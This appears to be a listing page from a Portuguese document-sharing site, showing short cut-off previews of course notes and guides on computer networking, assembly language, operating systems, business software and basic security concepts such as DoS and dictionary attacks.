18/05/2014. Problemas atuais com o IPv4 Problemas atuais com o IPv4 Fundamentos de Redes de Computadores Prof. Marcel Santos Silva Falhas de segurança: A maioria dos ataques contra computadores hoje na Internet só é possível devido a falhas

Leia mais

1 Ajuda da Internet M vel Clix

1 Ajuda da Internet M vel Clix 1 Ajuda da Internet M vel Clix Descrição geral Esta aplicação permite Ligar/Desligar por intermédio de uma PC Card / Modem USB. Janela principal da Internet M vel Clix Indica o estado de roaming Minimizes

Leia mais

FAQ s ELEVATION Express

FAQ s ELEVATION Express FAQ s ELEVATION Express PRIMAVERA Business Software Solutions Contents FAQ s... 3 2 FAQ s 1. Como configurar Motivos de Isenção Diferentes por artigo na mesma FA? 1º Criar novos Tipos de Imposto para cada

Leia mais

Professor: Dr. Rogério Rodrigues de Vargas.

Professor: Dr. Rogério Rodrigues de Vargas. UNIVERSIDADE ESTADUAL DE SANTA CRUZ DEPARTAMENTO DE CIÊNCIAS EXATAS E TECNOLÓGICAS Bacharelado em Ciência da Computação Software Básico Linguagem de Programação Assembly: Uma introdução no Linux/i386 (AT&T)

Leia mais

Protocolo Ethernet e Dispositivos de Interconexão de LANs

Protocolo Ethernet e Dispositivos de Interconexão de LANs Protocolo Ethernet e Dispositivos de Interconexão de LANs Prof. Rafael Guimarães Redes de Alta Velocidade Tópico 4 - Aula 1 Tópico 4 - Aula 1 Rafael Guimarães 1 / 31 Sumário Sumário 1 Motivação 2 Objetivos

Leia mais

genérico proteção de rede filtragem dos pacotes Sem estado (stateless) no próprio pacote. Com estado (stateful) outros pacotes

genérico proteção de rede filtragem dos pacotes Sem estado (stateless) no próprio pacote. Com estado (stateful) outros pacotes FIREWALLS Firewalls Definição: Termo genérico utilizado para designar um tipo de proteção de rede que restringe o acesso a certos serviços de um computador ou rede de computadores pela filtragem dos pacotes

Leia mais

Componentes básicos de um sistema computacional. Cap. 1 (Stallings)

Componentes básicos de um sistema computacional. Cap. 1 (Stallings) Componentes básicos de um sistema computacional Cap. 1 (Stallings) 1 Sistema de Operação Explora recursos de hardware de um ou mais processadores Provê um conjunto de serviços aos utilizadores Gerencia

Leia mais

Gestor de Janelas Gnome

Gestor de Janelas Gnome 6 3 5 Gestor de Janelas Gnome Nesta secção será explicado o funcionamento de um dos ambientes gráficos disponíveis no seu Linux Caixa Mágica, o Gnome. Na figura 5.1 apresentamos o GDM, o sistema gráfico

Leia mais

Olho por olho, e o mundo acabará cego. Mohandas Gandhi

Olho por olho, e o mundo acabará cego. Mohandas Gandhi Sockets Olho por olho, e o mundo acabará cego. Mohandas Gandhi Conectando-se a máquinas remotas. Protocolo Da necessidade de dois computadores se comunicarem surgiram diversos protocolos que permitissem

Leia mais

Nível da Arquitetura do Conjunto das Instruções

Nível da Arquitetura do Conjunto das Instruções Nível da Arquitetura do Conjunto das Instruções (Aula 13) Fluxo de Controle Fluxo Seqüencial de Controle e Desvios (1) Fluxo de Controle: É a seqüência na qual instruções são dinamicamente executadas Isto

Leia mais

UNIVERSIDADE CATÓLICA PORTUGUESA

UNIVERSIDADE CATÓLICA PORTUGUESA UNIVERSIDADE CATÓLICA PORTUGUESA WebShare Serviço de partilha de ficheiros via WebDAV versão: 2.0.3 Nelson Rodrigues Direcção de Sistemas de Informação 28-10-2010 ÍNDICE: Introdução... 3 Requisitos...

Leia mais

Ambiente de trabalho. Configurações. Acessórios

Ambiente de trabalho. Configurações. Acessórios Ambiente de trabalho Configurações Acessórios O Sistema Operativo (SO) é o conjunto de programas fundamentais que permitem que o computador funcione e comunique com o exterior. Actualmente, o Windows é

Leia mais

Endereço IP Privado. Endereçamento IP. IP Protocolo da Internet. Protocolos da. Camada de Inter-Rede (Internet)

Endereço IP Privado. Endereçamento IP. IP Protocolo da Internet. Protocolos da. Camada de Inter-Rede (Internet) Protocolos da Camada de Inter- (Internet) IP Protocolo da Internet. Não Confiável; Não Orientado à conexão; Trabalha com Datagramas; Roteável; IPv 4 32 bits; IPv 6 128 bits; Divisão por Classes (A,B,C,D,E);

Leia mais

PRIMAVERA EXPRESS: Funcionalidades do Produto

PRIMAVERA EXPRESS: Funcionalidades do Produto PRIMAVERA EXPRESS: Funcionalidades do Produto Como efetuo a mudança de ano do Ponto de Venda? No Programa Express aceda a Tabelas Pontos de Venda Postos de Venda abrir o separador Movimentos Caixa e: -

Leia mais

Entradas/Saídas. Programação por interrupções Conceitos gerais Programação da porta série Transmissão

Entradas/Saídas. Programação por interrupções Conceitos gerais Programação da porta série Transmissão Entradas/Saídas Programação por interrupções Conceitos gerais Programação da porta série Transmissão Problemas a resolver Como identificar a interrupção? Motivo da interrupção Que rotina executar? Como

Leia mais

Relatório do 2º Guião Laboratorial de Avaliação: Encaminhamento de pacotes. Licenciatura: ETI Turma : ETC1 Grupo : rd2_t3_02 Data: 30/10/2009

Relatório do 2º Guião Laboratorial de Avaliação: Encaminhamento de pacotes. Licenciatura: ETI Turma : ETC1 Grupo : rd2_t3_02 Data: 30/10/2009 Licenciaturas em Informática e Gestão de Empresas, Engenharia de Telecomunicações e Informática e Engenharia Informática Redes Digitais II Relatório do 2º Guião Laboratorial de Avaliação: Encaminhamento

Leia mais

Redes de Computadores 1 o Exame

Redes de Computadores 1 o Exame Redes de Computadores 1 o Exame 28 de Junho de 2006 Nota prévia As respostas erradas nas questões de escolha múltipla descontam a cotação dessa questão a dividir pelo número de alternativas. O exame tem

Leia mais

Controle Parental. Introdução

Controle Parental. Introdução Controle Parental Introdução O acesso das crianças à Internet suscita algumas preocupações aos pais e educadores/as. Contudo, tal como na vida real ou no uso de outros meios de comunicação, os adultos

Leia mais

www.projetoderedes.com.br Gestão da Segurança da Informação Professor: Maurício AULA 04 Tipos de Ataques

www.projetoderedes.com.br Gestão da Segurança da Informação Professor: Maurício AULA 04 Tipos de Ataques Ataque de Dicionário www.projetoderedes.com.br Trata-se de um ataque baseado em senhas que consiste na cifragem das palavras de um dicionário e posterior comparação com os arquivos de senhas de usuários.

Leia mais

SEGURANÇA DO WINDOWS Análise sobre as APIs. Por: Fergo

SEGURANÇA DO WINDOWS Análise sobre as APIs. Por: Fergo SEGURANÇA DO WINDOWS Análise sobre as APIs Por: Fergo INTRODUÇÃO Você já se perguntou alguma vez sobre o porquê do Windows suscetível à falhas e a execução de códigos mal intencionados? Neste artigo eu

Leia mais

Redes de Computadores 3ª Colecção Exercícios diversos 16 de Dezembro de 2005 Spanning Tree, Protocolo IP, Encaminhamento em redes IP e Cam.

Redes de Computadores 3ª Colecção Exercícios diversos 16 de Dezembro de 2005 Spanning Tree, Protocolo IP, Encaminhamento em redes IP e Cam. I Bridging Transparente Spanning Tree 1) Considere a rede local, da figura. Admitindo que as bridges são transparentes e correm o algoritmo Spanning Tree (IEEE 802.1d) HOST Y HOST Z HOST X Bridge Prioridade

Leia mais

PROCESSAMENTO DE DADOS

PROCESSAMENTO DE DADOS PROCESSAMENTO DE DADOS Aula 1 - Hardware Profa. Dra. Amanda Liz Pacífico Manfrim Perticarrari Profa. Dra. Amanda Liz Pacífico Manfrim Perticarrari 2 3 HARDWARE Todos os dispositivos físicos que constituem

Leia mais

Instituto Superior Técnico. Projecto VoIP. Sistema IVVR

Instituto Superior Técnico. Projecto VoIP. Sistema IVVR Instituto Superior Técnico Projecto VoIP Sistema IVVR 68239 Rui Barradas 68477 Helton Miranda 68626 Ludijor Barros 72487 Bruna Gondin Introdução O objectivo deste projecto é desenvolver um sistema de Interactive

Leia mais

Redes de Computadores. Camada de Transporte de Dados: protocolos TCP e UDP Prof. MSc Hugo Vieira L. Souza

Redes de Computadores. Camada de Transporte de Dados: protocolos TCP e UDP Prof. MSc Hugo Vieira L. Souza Redes de Computadores Camada de Transporte de Dados: protocolos TCP e UDP Prof. MSc Hugo Vieira L. Souza Este documento está sujeito a copyright. Todos os direitos estão reservados para o todo ou quaisquer

Leia mais

Conjunto de instruções e modos de. aula 4. Profa. Débora Matos

Conjunto de instruções e modos de. aula 4. Profa. Débora Matos Conjunto de instruções e modos de endereçamento aula 4 Profa. Débora Matos Conjunto de Instruções A = ((B + C) x D + E F)/(G x H) A H denotam posições da memória endereços As arquiteturas possuem as seguintes

Leia mais

Print Audit 6 - Instalação do SQL Server 2008 express R2

Print Audit 6 - Instalação do SQL Server 2008 express R2 Print Audit 6 - Instalação do SQL Server 2008 express R2 Este tutorial mostra a instalação e configuração passo a passo do SQLServer 2008 express R2. Antes de instalar o SQL Server 2008 Express R2 Antes

Leia mais

Redes. Pablo Rodriguez de Almeida Gross

Redes. Pablo Rodriguez de Almeida Gross Redes Pablo Rodriguez de Almeida Gross Conceitos A seguir serão vistos conceitos básicos relacionados a redes de computadores. O que é uma rede? Uma rede é um conjunto de computadores interligados permitindo

Leia mais

Network Top: Uma Ferramenta Automatizada para Análise e Gerenciamento de Redes

Network Top: Uma Ferramenta Automatizada para Análise e Gerenciamento de Redes Network Top: Uma Ferramenta Automatizada para Análise e Gerenciamento de Redes Adriano K. Maron, Anderson B. Pinheiro 1 Universidade Católica de Pelotas (UCPEL) Caixa Postal 96010-000 Pelotas RS Brazil

Leia mais

Modelos de Camadas. Professor Leonardo Larback

Modelos de Camadas. Professor Leonardo Larback Modelos de Camadas Professor Leonardo Larback Modelo OSI Quando surgiram, as redes de computadores eram, em sua totalidade, proprietárias, isto é, uma determinada tecnologia era suportada apenas por seu

Leia mais

Protocolo de resolução de endereços: ARP

Protocolo de resolução de endereços: ARP Protocolo de resolução de endereços: ARP Introdução, cache ARP, formato do pacote ARP, exemplos de ARP em acção, proxy ARP, ARP "Gratuito, comando arp. Endereço físico Os endereços IP fazem apenas sentido

Leia mais

Redes de Computadores

Redes de Computadores Redes de Computadores Prof. Marcelo Gonçalves Rubinstein Programa de Pós-Graduação em Engenharia Eletrônica Faculdade de Engenharia Universidade do Estado do Rio de Janeiro Ementa Introdução a Redes de

Leia mais

COMPETÊNCIAS BÁSICAS EM TIC NAS EB1

COMPETÊNCIAS BÁSICAS EM TIC NAS EB1 COMPETÊNCIAS BÁSICAS EM TIC NAS EB1 Oficina do Correio Para saber mais sobre Correio electrónico 1. Dicas para melhor gerir e organizar o Correio Electrónico utilizando o Outlook Express Criar Pastas Escrever

Leia mais

CCNA 2 Conceitos Básicos de Roteadores e Roteamento

CCNA 2 Conceitos Básicos de Roteadores e Roteamento CCNA 2 Conceitos Básicos de Roteadores e Roteamento Capítulo 10 - TCP/IP Intermediário 1 Objetivos do Capítulo Descrever o TCP e sua função; Descrever a sincronização e o controle de fluxo do TCP; Descrever

Leia mais

Guia Rápido. Versão 9.0. Mover a perícia - não as pessoas

Guia Rápido. Versão 9.0. Mover a perícia - não as pessoas Guia Rápido Versão 9.0 Mover a perícia - não as pessoas Copyright 2006 Danware Data A/S. Partes utilizadas sob licença de terceiros. Todos os direitos reservados. Revisão do documento: 2006080 Por favor,

Leia mais

Ataques DoS e DDoS. Alessandro Santos Germer Rafael Ambiel Faccioli Roberto Röseling Badô. 1. Introdução

Ataques DoS e DDoS. Alessandro Santos Germer Rafael Ambiel Faccioli Roberto Röseling Badô. 1. Introdução Ataques DoS e DDoS Alessandro Santos Germer Rafael Ambiel Faccioli Roberto Röseling Badô 1. Introdução DoS - Denial of Service DDoS - Distributed Denial of Service Falhas no protocolo TCP/IP Ataques desde

Leia mais

TE11008 Arquitetura e Organização de Computadores Nível da Linguagem de Montagem p. 1

TE11008 Arquitetura e Organização de Computadores Nível da Linguagem de Montagem p. 1 TE11008 Arquitetura e Organização de Computadores Nível da Linguagem de Montagem Ronaldo de Freitas Zampolo LaPS/ENGCOMP/ITEC/UFPA TE11008 Arquitetura e Organização de Computadores Nível da Linguagem de

Leia mais

Linguagem de Montagem

Linguagem de Montagem Linguagem de Montagem Procedimentos e a Pilha Slides baseados em material associado ao livro Introduction to Assembly Language Programming, Sivarama Dandamudi 1 O que é a pilha? A pilha é uma estrutura

Leia mais

Apresentação de REDES DE COMUNICAÇÃO

Apresentação de REDES DE COMUNICAÇÃO Apresentação de REDES DE COMUNICAÇÃO Curso Profissional de Técnico de Gestão e Programação de Sistemas Informáticos MÓDULO VIII Serviços de Redes Duração: 20 tempos Conteúdos (1) 2 Caraterizar, instalar

Leia mais

Capítulo 9. Gerenciamento de rede

Capítulo 9. Gerenciamento de rede 1 Capítulo 9 Gerenciamento de rede 2 Redes de computadores I Prof.: Leandro Soares de Sousa E-mail: leandro.uff.puro@gmail.com Site: http://www.ic.uff.br/~lsousa Não deixem a matéria acumular!!! Datas

Leia mais

Luckas Andre Farias. Criptografia em hardware usando VHDL aplicado a VOIP

Luckas Andre Farias. Criptografia em hardware usando VHDL aplicado a VOIP Luckas Andre Farias Criptografia em hardware usando VHDL aplicado a VOIP Londrina 2012 Luckas Andre Farias Criptografia em hardware usando VHDL aplicado a VOIP Trabalho de Conclusão de curso apresentado

Leia mais

Windows 98 e Windows Me

Windows 98 e Windows Me Windows 98 e Windows Me "Etapas preliminares" na página 3-27 "Etapas de instalação rápida em CD-ROM" na página 3-28 "Outros métodos de instalação" na página 3-28 "Solução de problemas do Windows 98 e Windows

Leia mais